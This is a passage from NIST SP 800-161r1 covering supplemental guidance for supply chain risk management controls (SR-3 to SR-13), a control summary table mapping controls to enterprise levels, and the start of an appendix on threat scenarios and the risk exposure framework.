Supplemental C-SCRM Guidance: Enterprises should diversify their supply base, especially for critical
ICT/OT products and services. As a part of this exercise, the enterprise should attempt to identify
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
154
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
single points of failure and risk among primes and lower-level entities in the supply chain. See Section
2, Appendix C, and RA-9 for guidance on conducting criticality analysis.
Level(s): 2, 3
Related Controls: RA-9
(2)
SUPPLY CHAIN CONTROLS AND PROCESSES | SUB-TIER FLOW DOWN
Supplemental C-SCRM Guidance: Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors throughout the SDLC. The use
of the acquisition process provides an important vehicle to protect the supply chain. As part of
procurement requirements, enterprises should include the need for suppliers to flow down controls to
subcontractors throughout the SDLC. As part of market research and analysis activities, enterprises
should conduct robust due diligence research on potential suppliers or products, as well as their
upstream dependencies (e.g., fourth- and fifth-party suppliers), which can help enterprises avoid single
points of failure within their supply chains. The results of this research can be helpful in shaping the
sourcing approach and refining requirements. An evaluation of the cybersecurity risks that arise from a
supplier, product, or service should be completed prior to the contract award decision to ensure that the
holistic risk profile is well-understood and serves as a weighted factor in award decisions. During the
period of performance, suppliers should be monitored for conformance to the defined controls and
requirements, as well as changes in risk conditions. See Section 3 for guidance on the Role of C-
SCRM in the Acquisition Process.
Level(s): 2, 3
SR-4
PROVENANCE
Supplemental C-SCRM Guidance: Provenance should be documented for systems, system components, and
associated data throughout the SDLC. Enterprises should consider producing SBOMs for applicable and
appropriate classes of software, including purchased software, open source software, and in-house
software. SBOMs should be produced using only NTIA-supported SBOM formats that can satisfy [NTIA
SBOM] EO 14028 NTIA minimum SBOM elements. Enterprises producing SBOMs should use [NTIA
SBOM] minimum SBOM elements as framing for the inclusion of primary components. SBOMs should be
digitally signed using a verifiable and trusted key. SBOMs can play a critical role in enabling organizations
to maintain provenance. However, as SBOMs mature, organizations should ensure they do not deprioritize
existing C-SCRM capabilities (e.g., vulnerability management practices, vendor risk assessments) under
the mistaken assumption that SBOM replaces these activities. SBOMs and the improved transparency that
they are meant to provide for organizations are a complementary, not substitutive, capability. Organizations
that are unable to appropriately ingest, analyze, and act on the data that SBOMs provide likely will not
improve their overall C-SCRM posture. Federal agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 2, 3
SR-5
ACQUISITION STRATEGIES, TOOLS, AND METHODS
Supplemental C-SCRM Guidance: Section 3 and SA controls provide additional guidance on acquisition
strategies, tools, and methods. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
155
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Related Controls: SA Control Family
SR-6
SUPPLIER ASSESSMENTS AND REVIEWS
Supplemental C-SCRM Guidance: In general, an enterprise should consider any information pertinent to
the security, integrity, resilience, quality, trustworthiness, or authenticity of the supplier or their provided
services or products. Enterprises should consider applying this information against a consistent set of core
baseline factors and assessment criteria to facilitate equitable comparison (between suppliers and over
time). Depending on the specific context and purpose for which the assessment is being conducting, the
enterprise may select additional factors. The quality of information (e.g., its relevance, completeness,
accuracy, etc.) relied upon for an assessment is also an important consideration. Reference sources for
assessment information should also be documented. The C-SCRM PMO can help define requirements,
methods, and tools for the enterprise’s supplier assessments. Departments and agencies should refer to
Appendix E for further guidance concerning baseline risk factors and the documentation of assessments
and Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 2, 3
SR-7
SUPPLY CHAIN OPERATIONS SECURITY
Supplemental C-SCRM Guidance: The C-SCRM PMO can help determine OPSEC controls that apply to
specific missions and functions. OPSEC controls are particularly important when there is specific concern
about an adversarial threat from or to the enterprise’s supply chain or an element within the supply chain,
or when the nature of the enterprise’s mission or business operations, its information, and/or its
service/product offerings make it a more attractive target for an adversarial threat.
Level(s): 2, 3
SR-8
NOTIFICATION AGREEMENTS
Supplemental C-SCRM Guidance: At minimum, enterprises should require their suppliers to establish
notification agreements with entities within their supply chain that have a role or responsibility related to
that critical service or product. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: RA-9
SR-9
TAMPER RESISTANCE AND DETECTION
Supplemental C-SCRM Guidance: Enterprises should apply tamper resistance and detection control to
critical components, at a minimum. Criticality analysis can help determine which components are critical.
See Section 2, Appendix C, and RA-9 for guidance on conducting criticality analysis. The C-SCRM PMO
can help identify critical components, especially those that are used by multiple missions, functions, and
systems within an enterprise. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: RA-9
SR-10 INSPECTION OF SYSTEMS OR COMPONENTS
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
156
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental C-SCRM Guidance: Enterprises should inspect critical systems and components, at a
minimum, for assurance that tamper resistance controls are in place and to examine whether there is
evidence of tampering. Products or components should be inspected prior to use and periodically thereafter.
Inspection requirements should also be included in contracts with suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers. Enterprises should require
their prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors and flow down to subcontractors, when relevant.
Criticality analysis can help determine which systems and components are critical and should therefore be
subjected to inspection. See Section 2, Appendix C, and RA-9 for guidance on conducting criticality
analysis. The C-SCRM PMO can help identify critical systems and components, especially those that are
used by multiple missions, functions, and systems (for components) within an enterprise.
Level(s): 2, 3
Related Controls: RA-9
SR-11 COMPONENT AUTHENTICITY
Supplemental C-SCRM Guidance: The development of anti-counterfeit policies and procedures requires
input from and coordination with acquisition, information technology, IT security, legal, and the C-SCRM
PMO. The policy and procedures should address regulatory compliance requirements, contract
requirements or clauses, and counterfeit reporting processes to enterprises, such as GIDEP and/or other
appropriate enterprises. Where applicable and appropriate, the policy should also address the development
and use of a qualified bidders list (QBL) and/or qualified manufacturers list (QML). This helps prevent
counterfeits through the use of authorized suppliers, wherever possible, and their integration into the
organization’s supply chain [CISA SCRM WG3]. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
COMPONENT AUTHENTICITY | ANTI-COUNTERFEIT TRAINING
Supplemental C-SCRM Guidance: The C-SCRM PMO can assist in identifying resources that can
provide anti-counterfeit training and/or may be able to conduct such training for the enterprise. The C-
SCRM PMO can also assist in identifying which personnel should receive the training.
Level(s): 2, 3
(2)
COMPONENT AUTHENTICITY | CONFIGURATION CONTROL FOR COMPONENT SERVICE AND REPAIR
Supplemental C-SCRM Guidance: Information technology, IT security, or the C-SCRM PMO should
be responsible for establishing and implementing configuration control processes for component
service and repair, to include – if applicable – integrating component service and repair into the overall
enterprise configuration control processes. Component authenticity should be addressed in contracts
when procuring component servicing and repair support.
Level(s): 2, 3
(3)
COMPONENT AUTHENTICITY | ANTI-COUNTERFEIT SCANNING
Supplemental C-SCRM Guidance: Enterprises should conduct anti-counterfeit scanning for critical
components, at a minimum. Criticality analysis can help determine which components are critical and
should be subjected to this scanning. See Section 2, Appendix C, and RA-9 for guidance on conducting
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
157
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
criticality analysis. The C-SCRM PMO can help identify critical components, especially those used by
multiple missions, functions, and systems within an enterprise.
Level(s): 2, 3
Related Controls: RA-9
SR-12 COMPONENT DISPOSAL
Supplemental C-SCRM Guidance: IT security – in coordination with the C-SCRM PMO – can help
establish appropriate component disposal policies, procedures, mechanisms, and techniques.
Level(s): 2, 3
SR-13 SUPPLIER INVENTORY (NEW)
Control:
a.
Develop, document, and maintain an inventory of suppliers that:
1. Accurately and minimally reflects the organization’s tier one suppliers that may present a
cybersecurity risk in the supply chain [Assignment: organization-defined parameters for
determining tier one supply chain];
2. Is at the level of granularity deemed necessary for assessing criticality and supply chain risk,
tracking, and reporting;
3. Documents the following information for each tier one supplier (e.g., prime contractor): review
and update supplier inventory [Assignment: enterprise-defined frequency].
i.
Unique identify for procurement instrument (i.e., contract, task, or delivery order);
ii.
Description of the supplied products and/or services;
iii.
Program, project, and/or system that uses the supplier’s products and/or services; and
iv.
Assigned criticality level that aligns to the criticality of the program, project, and/or system
(or component of system).
b. Review and update the supplier inventory [Assignment: enterprise-defined frequency].
Supplemental C-SCRM Guidance: Enterprises rely on numerous suppliers to execute their missions and
functions. Many suppliers provide products and services in support of multiple missions, functions,
programs, projects, and systems. Some suppliers are more critical than others, based on the criticality of
missions, functions, programs, projects, systems that their products and services support, and the
enterprise’s level of dependency on the supplier. Enterprises should use criticality analysis to help
determine which products and services are critical to determine the criticality of suppliers to be documented
in the supplier inventory. See Section 2, Appendix C, and RA-9 for guidance on conducting criticality
analysis.
Level(s): 2, 3
Related Controls: RA-9
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
158
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX B: C-SCRM CONTROL SUMMARY
This appendix lists the C-SCRM controls in this publication and maps them to their
corresponding [NIST SP 800-53, Rev. 5] controls as appropriate. Table B-1 indicates those
controls that are defined in [NIST SP 800-53, Rev. 5]. Low baseline requirements are deemed to
be relevant to C-SCRM. Some C-SCRM controls were added to this control set to form the C-
SCRM baseline. Additionally, controls that should flow down from prime contractors to their
relevant sub-tier contractors are listed as Flow Down Controls. Given that C-SCRM is an
enterprise-wide activity that requires the selection and implementation of controls at the
enterprise, mission and business, and operational levels (Levels 1, 2, and 3 of the enterprise
according to [NIST SP 800-39]), Table B-1 indicates the enterprise levels at which the controls
should be implemented. C-SCRM controls and control enhancements not in [NIST SP 800-53,
Rev. 5] are noted with an asterisk next to the control identifier, viz., MA-8 and SR-13.
Table B-1: C-SCRM Control Summary
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
AC-1
Policy and Procedures
x
x
x
x
x
AC-2
Account Management
x
x
x
x
AC-3
Access Enforcement
x
x
x
x
AC-3(8)
Access Enforcement | Revocation of Access
Authorizations
x
x
AC-3(9)
Access Enforcement | Controlled Release
x
x
AC-4
Information Flow Enforcement
x
x
x
AC-4(6)
Information Flow Enforcement | Metadata
x
x
AC-4(17)
Information Flow Enforcement | Domain
Authentication
x
x
AC-4(19)
Information Flow Enforcement | Validation of
Metadata
x
x
AC-4(21)
Information Flow Enforcement | Physical or Logical
Separation of Information Flows
x
AC-5
Separation of Duties
x
x
x
AC-6(6)
Least Privilege | Privileged Access by Non-
organizational Users
x
x
AC-17
Remote Access
x
x
x
x
AC-17(6)
Remote Access | Protection of Mechanism Information
x
x
AC-18
Wireless Access
x
x
x
x
AC-19
Access Control for Mobile Devices
x
x
x
AC-20
Use of External Systems
x
x
x
x
x
AC-20(1)
Use of External Systems | Limits on Authorized Use
x
x
AC-20(3)
Use of External Systems | Non-organizationally
Owned Systems — Restricted Use
x
x
AC-21
Information Sharing
x
x
AC-22
Publicly Accessible Content
x
x
x
AC-23
Data Mining Protection
x
x
x
AC-24
Access Control Decisions
x
x
x
x
AT-1
Policy and Procedures
x
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
159
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
AT-2(1)
Literacy Training and Awareness | Practical Exercises
x
AT-2(2)
Literacy Training and Awareness | Insider Threat
x
x
x
AT-2(3)
Literacy Training and Awareness | Social Engineering
and Mining
x
AT-2(4)
Literacy Training and Awareness | Suspicious
Communications and Anomalous System Behavior
x
AT-2(5)
Literacy Training and Awareness | Advanced
Persistent Threat
x
AT-2(6)
Literacy Training and Awareness | Cyber Threat
Environment
x
AT-3
Role-based Training
x
x
x
AT-3(2)
Role-based Training | Physical Security Controls
x
AT-4
Training Records
x
x
AU-1
Policy and Procedures
x
x
x
x
AU-2
Event Logging
x
x
x
x
x
AU-3
Content of Audit Records
x
x
x
x
x
AU-6
Audit Record Review, Analysis, and Reporting
x
x
x
AU-6(9)
Audit Record Review, Analysis, and Reporting |
Correlation with Information from Non-technical
Sources
x
AU-10
Non-repudiation
x
AU-10(1)
Non-repudiation | Association of Identities
x
AU-10(2)
Non-repudiation | Validate Binding of Information
Producer Identity
x
x
AU-10(3)
Non-repudiation | Chain of Custody
x
x
AU-12
Audit Record Generation
x
x
x
x
AU-13
Monitoring for Information Disclosure
x
x
x
AU-14
Session Audit
x
x
x
AU-16
Cross-organizational Audit Logging
x
x
AU-16(2)
Cross-organizational Audit Logging | Sharing of Audit
Information
x
x
x
CA-1
Policy and Procedures
x
x
x
x
CA-2
Control Assessments
x
x
x
CA-2(2)
Control Assessments | Specialized Assessments
x
CA-2(3)
Control Assessments | Leveraging Results from
External Organizations
x
CA-3
Information Exchange
x
x
x
CA-5
Plan of Action and Milestones
x
x
x
CA-6
Authorization
x
x
x
x
CA-7(3)
Continuous Monitoring | Trend Analyses
x
CM-1
Policy and Procedures
x
x
x
x
CM-2
Baseline Configuration
x
x
x
x
CM-2(6)
Baseline Configuration | Development and Test
Environments
x
x
CM-3
Configuration Change Control
x
x
x
CM-3(1)
Configuration Change Control | Automated
Documentation, Notification, and Prohibition of
Changes
x
x
CM-3(2)
Configuration Change Control | Testing, Validation,
and Documentation of Changes
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
160
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
CM-3(4)
Configuration Change Control | Security and Privacy
Representatives
x
x
CM-3(8)
Configuration Change Control | Prevent or Restrict
Configuration Changes
x
x
CM-4
Impact Analyses
x
x
CM-4(1)
Impact Analyses | Separate Test Environments
x
CM-5
Access Restrictions for Change
x
x
x
CM-5(1)
Access Restrictions for Change | Automated Access
Enforcement and Audit Records
x
CM-5(6)
Access Restrictions for Change | Limit Library
Privileges
x
CM-6
Configuration Settings
x
x
x
x
CM-6(1)
Configuration Settings | Automated Management,
Application, and Verification
x
CM-6(2)
Configuration Settings | Respond to Unauthorized
Changes
x
CM-7
Least Functionality
x
x
x
CM-7(1)
Least Functionality | Periodic Review
x
x
CM-7(4)
Least Functionality | Unauthorized Software
x
x
CM-7(5)
Least Functionality | Authorized Software
x
CM-7(6)
Least Functionality | Confined Environments with
Limited Privileges
x
x
CM-7(7)
Least Functionality | Code Execution in Protected
Environments
x
CM-7(8)
Least Functionality | Binary or Machine Executable
Code
x
x
CM-7(9)
Least Functionality | Prohibiting the Use of
Unauthorized Hardware
x
x
CM-8
System Component Inventory
x
x
x
x
CM-8(1)
System Component Inventory | Updates During
Installation and Removal
x
CM-8(2)
System Component Inventory | Automated
Maintenance
x
CM-8(4)
System Component Inventory | Accountability
Information
x
CM-8(6)
System Component Inventory | Assessed
Configurations and Approved Deviations
x
CM-8(7)
System Component Inventory | Centralized Repository
x
CM-8(8)
System Component Inventory | Automated Location
Tracking
x
x
CM-8(9)
System Component Inventory | Assignment of
Components to Systems
x
CM-9
Configuration Management Plan
x
x
x
CM-9(1)
Configuration Management Plan | Assignment of
Responsibility
x
x
CM-10
Software Usage Restrictions
x
x
x
CM-10(1)
Software Usage Restrictions | Open source Software
x
x
CM-11
User-installed Software
x
x
x
CM-12
Information Location
x
x
CM-12(1)
Information Location | Automated Tools to Support
Information Location
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
161
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
CM-13
Data Action Mapping
x
x
CM-14
Signed Components
x
CP-1
Policy and Procedures
x
x
x
x
CP-2
Contingency Plan
x
x
x
CP-2(1)
Contingency Plan | Coordinate with Related Plans
x
x
CP-2(2)
Contingency Plan | Capacity Planning
x
x
CP-2(7)
Contingency Plan | Coordinate with External Service
Providers
x
x
CP-2(8)
Contingency Plan | Identify Critical Assets
x
CP-3
Contingency Training
x
x
x
x
CP-3(1)
Contingency Training | Simulated Events
x
x
CP-4
Contingency Plan Testing
x
x
x
CP-6
Alternative Storage Site
x
x
CP-6(1)
Alternative Storage Site | Separation from Primary
Site
x
x
CP-7
Alternative Processing Site
x
x
CP-8
Telecommunications Services
x
x
CP-8(3)
Telecommunications Services | Separation of Primary
and Alternative Providers
x
x
CP-8(4)
Telecommunications Services | Provider Contingency
Plan
x
x
CP-11
Alternative Communications Protocols
x
x
IA-1
Policy and Procedures
x
x
x
x
IA-2
Identification and Authentication (Organizational
Users)
x
x
x
x
x
IA-3
Device Identification and Authentication
x
x
x
IA-4
Identifier Management
x
x
x
x
IA-4(6)
Identifier Management | Cross-organization
Management
x
x
x
IA-5
Authenticator Management
x
x
x
x
IA-5(5)
Authenticator Management | Change Authenticators
Prior to Delivery
x
IA-5(9)
Authenticator Management | Federated Credential
Management
x
IA-8
Identification and Authentication (Non-
organizational Users)
x
x
x
IA-9
Service Identification and Authentication
x
x
x
IR-1
Policy and Procedures
x
x
x
x
x
IR-2
Incident Response Training
x
x
x
x
IR-3
Incident Response Testing
x
x
IR-4(6)
Incident Handling | Insider Threats
x
x
x
IR-4(7)
Incident Handling | Insider Threats — Intra-
organization Coordination
x
x
x
IR-4(10)
Incident Handling | Supply Chain Coordination
x
x
IR-4(11)
Incident Handling | Integrated Incident Response
Team
x
IR-5
Incident Monitoring
x
x
x
IR-6(3)
Incident Reporting | Supply Chain Coordination
x
x
IR-7(2)
Incident Response Assistance | Coordination with
External Providers
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
162
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
IR-8
Incident Response Plan
x
x
x
x
IR-9
Information Spillage Response
x
x
MA-1
Policy and Procedures
x
x
x
x
x
MA-2(2)
Controlled Maintenance | Automated Maintenance
Activities
x
MA-3
Maintenance Tools
x
x
MA-3(1)
Maintenance Tools | Inspect Tools
x
MA-3(2)
Maintenance Tools | Inspect Media
x
MA-3(3)
Maintenance Tools | Prevent Unauthorized Removal
x
MA-4
Nonlocal Maintenance
x
x
x
x
MA-4(3)
Nonlocal Maintenance | Comparable Security and
Sanitization
x
x
MA-5
Maintenance Personnel
x
x
x
MA-5(4)
Maintenance Personnel | Foreign Nationals
x
x
x
MA-6
Timely Maintenance
x
MA-7
Field Maintenance
x
MA-8
Maintenance Monitoring and Information Sharing
x
MP-1
Policy and Procedures
x
x
x
MP-4
Media Storage
x
x
x
MP-5
Media Transport
x
x
MP-6
Media Sanitization
x
x
x
x
PE-1
Policy and Procedures
x
x
x
x
PE-2
Physical Access Authorizations
x
x
x
x
PE-2(1)
Physical Access Authorizations | Access by Position or
Role
x
x
PE-3
Physical Access Control
x
x
x
PE-3(1)
Physical Access Control | System Access
x
x
PE-3(2)
Physical Access Control | Facility and Systems
x
x
PE-3(5)
Physical Access Control | Tamper Protection
x
x
PE-6
Monitoring Physical Access
x
x
x
x
PE-16
Delivery and Removal
x
x
PE-17
Alternative Work Site
x
PE-18
Location of System Components
x
x
x
PE-20
Asset Monitoring and Tracking
x
x
PE-23
Facility Location
x
x
x
PL-1
Policy and Procedures
x
x
PL-2
System Security and Privacy Plans
x
x
x
PL-4
Rules of Behavior
x
x
x
PL-7
Concept of Operations
x
PL-8
Security and Privacy Architectures
x
x
PL-8(2)
Security and Privacy Architectures | Supplier
Diversity
x
x
PL-9
Central Management
x
x
PL-10
Baseline Selection
x
x
x
PM-2
Information Security Program Leadership Role
x
x
PM-3
Information Security and Privacy Resources
x
x
PM-4
Plan of Action and Milestones Process
x
x
PM-5
System Inventory
x
x
x
PM-6
Measures of Performance
x
x
PM-7
Enterprise Architecture
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
163
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
PM-8
Critical Infrastructure Plan
x
PM-9
Risk Management Strategy
x
PM-10
Authorization Process
x
x
PM-11
Mission and Business Process Definition
x
x
x
PM-12
Insider Threat Program
x
x
x
PM-13
Security and Privacy Workforce
x
x
PM-14
Testing, Training, and Monitoring
x
x
PM-15
Security and Privacy Groups and Associations
x
x
PM-16
Threat Awareness Program
x
x
PM-17
Protecting Controlled Unclassified Information on
External Systems
x
PM-18
Privacy Program Plan
x
x
x
PM-19
Privacy Program Leadership Role
x
PM-20
Dissemination of Privacy Program Information
x
x
PM-21
Accounting of Disclosures
x
x
PM-22
Personally Identifiable Information Quality
Management
x
x
PM-23
Data Governance Body
x
PM-25
Minimization of Personally Identifiable
Information Used in Testing, Training, and
Research
x
PM-26
Complaint Management
x
x
PM-27
Privacy Reporting
x
x
PM-28
Risk Framing
x
PM-29
Risk Management Program Leadership Roles
x
PM-30
Supply Chain Risk Management Strategy
x
x
PM-31
Continuous Monitoring Strategy
x
x
x
PM-32
Purposing
x
x
PS-1
Policy and Procedures
x
x
x
x
x
PS-3
Personnel Screening
x
x
x
x
PS-6
Access Agreements
x
x
x
x
PS-7
External Personnel Security
x
x
PT-1
Policy and Procedures
x
x
x
x
RA-1
Policy and Procedures
x
x
x
x
RA-2
Security Categorization
x
x
x
x
RA-3
Risk Assessment
x
x
x
x
RA-5
Vulnerability Monitoring and Scanning
x
x
x
x
RA-5(3)
Vulnerability Monitoring and Scanning | Breadth and
Depth of Coverage
x
x
RA-5(6)
Vulnerability Monitoring and Scanning | Automated
Trend Analyses
x
x
RA-7
Risk Response
x
x
x
x
RA-9
Criticality Analysis
x
x
x
x
RA-10
Threat Hunting
x
x
x
SA-1
Policy and Procedures
x
x
x
x
SA-2
Allocation of Resources
x
x
x
SA-3
System Development Life Cycle
x
x
x
x
SA-4
Acquisition Process
x
x
x
x
SA-4(5)
Acquisition Process | System, Component, and Service
Configurations
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
164
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
SA-4(7)
Acquisition Process | NIAP-approved Protection
Profiles
x
x
SA-4(8)
Acquisition Process | Continuous Monitoring Plan for
Controls
x
x
SA-5
System Documentation
x
x
SA-8
Security and Privacy Engineering Principles
x
x
x
x
SA-9(1)
External System Services | Risk Assessments and
Organizational Approvals
x
x
SA-9(3)
External System Services | Establish and Maintain
Trust Relationship with Providers
x
x
x
SA-9(4)
External System Services | Consistent Interests of
Consumers and Providers
x
SA-9(5)
External System Services | Processing, Storage, and
Service Location
x
SA-10
Developer Configuration Management
x
x
SA-11
Developer Testing and Evaluation
x
x
x
SA-15
Development Process, Standards, and Tools
x
x
SA-15(3)
Development Process, Standards, and Tools |
Criticality Analysis
x
x
SA-15(4)
Development Process, Standards, and Tools | Threat
Modeling and Vulnerability Analysis
x
x
SA-15(8)
Development Process, Standards, and Tools | Reuse of
Threat and Vulnerability Information
x
SA-16
Developer-provided Training
x
x
SA-17
Developer Security and Privacy Architecture and
Design
x
x
SA-20
Customized Development of Critical Components
x
x
SA-21
Developer Screening
x
x
x
SA-21(1)
Developer Screening | Validation of Screening
x
x
SA-22
Unsupported System Components
x
x
x
SC-1
Policy and Procedures
x
x
x
x
SC-4
Information in Shared System Resources
x
x
SC-5(2)
Denial-of-service Protection | Capacity, Bandwidth,
and Redundancy
x
SC-7
Boundary Protection
x
x
x
SC-7(13)
Boundary Protection | Isolation of Security Tools,
Mechanisms, and Support Components
x
x
SC-7(14)
Boundary Protection | Protect Against Unauthorized
Physical Connections
x
x
SC-7(19)
Boundary Protection | Block Communication from
Non-organizationally Configured Hosts
x
SC-8
Transmission Confidentiality and Integrity
x
x
x
SC-18
Mobile Code
x
SC-18(2)
Mobile Code | Acquisition, Development, and Use
x
SC-27
Platform-independent Applications
x
x
SC-28
Protection of Information at Rest
x
x
x
SC-29
Heterogeneity
x
x
SC-30
Concealment and Misdirection
x
x
SC-30(2)
Concealment and Misdirection | Randomness
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
165
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Control
Identifier
Control (or Control Enhancement) Name
C-SCRM
Baseline
Flow Down
Control
1
2
3
SC-30(3)
Concealment and Misdirection | Change Processing
and Storage Locations
x
x
SC-30(4)
Concealment and Misdirection | Misleading
Information
x
x
SC-30(5)
Concealment and Misdirection | Concealment of
System Components
x
x
SC-36
Distributed Processing and Storage
x
x
x
SC-37(1)
Out-of-band Channels | Ensure Delivery and
Transmission
x
x
SC-38
Operations Security
x
x
SC-47
Alternative Communications Paths
x
x
x
SI-1
Policy and Procedures
x
x
x
x
SI-2
Flaw Remediation
x
x
x
x
SI-2(5)
Flaw Remediation | Automatic Software and
Firmware Updates
x
SI-3
Malicious Code Protection
x
x
x
x
SI-4
System Monitoring
x
x
x
x
x
SI-4(17)
System Monitoring | Integrated Situational Awareness
x
x
SI-4(19)
System Monitoring | Risk for Individuals
x
x
SI-5
Security Alerts, Advisories, and Directives
x
x
x
x
x
SI-7
Software, Firmware, and Information Integrity
x
x
x
x
SI-7(14)
Software, Firmware, and Information Integrity |
Binary or Machine Executable Code
x
x
SI-7(15)
Software, Firmware, and Information Integrity | Code
Authentication
x
SI-12
Information Management and Retention
x
x
SI-20
Tainting
x
x
x
SR-1
Policy and Procedures
x
x
x
x
SR-2
Supply Chain Risk Management Plan
x
x
SR-3
Supply Chain Controls and Processes
x
x
x
x
SR-3(1)
Supply Chain Controls and Processes | Diverse Supply
Base
x
x
SR-3(3)
Supply Chain Controls and Processes | Sub-tier Flow
Down
x
x
x
SR-4
Provenance
x
x
SR-5
Acquisition Strategies, Tools, and Methods
x
x
x
x
SR-6
Supplier Assessments and Reviews
x
x
SR-7
Supply Chain Operations Security
x
x
SR-8
Notification Agreements
x
x
x
SR-9
Tamper Resistance and Detection
x
x
SR-10
Inspection of Systems or Components
x
x
x
x
SR-11
Component Authenticity
x
x
x
x
SR-11(1)
Component Authenticity | Anti-counterfeit Training
x
x
x
SR-11(2)
Component Authenticity | Configuration Control for
Component Service and Repair
x
x
x
SR-11(3)
Component Authenticity | Anti-counterfeit Scanning
x
x
SR-12
Component Disposal
x
x
x
SR-13
Supplier Inventory
x
x
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
166
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX C: RISK EXPOSURE FRAMEWORK38
There are numerous opportunities for vulnerabilities that impact the enterprise environment or
the system/element to be intentionally or unintentionally inserted, created, or exploited
throughout the supply chain. The exploitation of these vulnerabilities is known as a supply chain
threat event. A Threat Scenario is a set of discrete threat events associated with a specific
potential or identified existing threat source or multiple threat sources, partially ordered in time.
Developing and analyzing threat scenarios can help enterprises have a more comprehensive
understanding of the various types of threat events that can occur and lay the groundwork for
analyzing the likelihood and impact that a specific event or events would have on an enterprise.
Conducting this analysis is a useful way to discover gaps in controls and to identify and prioritize
appropriate mitigating strategies.39
Threat scenarios are generally used in two ways:
1. To translate the often disconnected information garnered from a risk assessment, as
described in [NIST SP 800-30, Rev. 1], into a more narrowly scoped and tangible story-
like situation for further evaluation. These stories can help enterprises discover
dependencies and additional vulnerabilities that require mitigation and are used for
training.
2. To determine the impact that a successful exercise of a specific vulnerability would have
on the enterprise and identify the benefits of mitigating strategies.
Threat scenarios serve as a critical component of the enterprise’s cybersecurity supply chain risk
management process described in Appendix G of this publication. An enterprise forms a threat
scenario to analyze a disparate set of threat and vulnerability conditions to assemble a cohesive
story that can be analyzed as part of a risk assessment. With a threat scenario defined, the
enterprise can complete a risk assessment to understand how likely the scenario is and what
would happen (i.e., the impact) as a result. Ultimately, the analyzed components of a threat
scenario are used to reach a risk determination that represents the conclusion of an enterprise’s
level of exposure to cybersecurity risks throughout the supply chain.
Once a risk determination has been made, the enterprise will determine a path for responding to
the risk using the Risk Exposure Framework. Within the Risk Exposure Framework, enterprises
will document the threat scenario, the risk analysis, the identified risk response strategy, and any
associated C-SCRM controls.
